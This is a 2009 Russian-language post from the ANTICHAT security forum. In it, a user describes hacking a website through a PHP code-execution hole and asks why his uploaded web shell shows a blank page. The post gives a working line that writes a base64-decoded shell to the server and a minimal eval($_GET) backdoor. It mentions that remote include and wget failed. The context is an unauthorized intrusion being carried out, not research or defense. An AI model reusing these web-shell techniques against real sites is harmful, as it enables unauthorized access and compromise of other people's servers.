HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 13.09.2009, 22:17
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию

Итак господа, при взломе очередного сайта я наткнулся на очередной ребус, который разгадать не могу.
Значит дырка выполнение php кода, пытаюсь залить шелл через такую конструкцию:
fputs(fopen('/www/shell.php',a),base64_decode('B64CODE'));
Шелл заливается нормально, но при попытке зайти на него, белая страница. Дело явно не в .htaccess и не в правах файла.
Если таким образом залить простой сценарий:
Код:
<?php
echo 'LOL';
?>
То он успешно выполняется, но если залить такой:
Код:
<?php
eval($_GET['lol']);
?>
То белая страница. Вот и всё...

Удалённого инклуда нету, через copy тоже самое, wget не работает вообще... Какие мысли на этот счёт у кого?
Лично я с таким сталкиваюсь впервые.
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ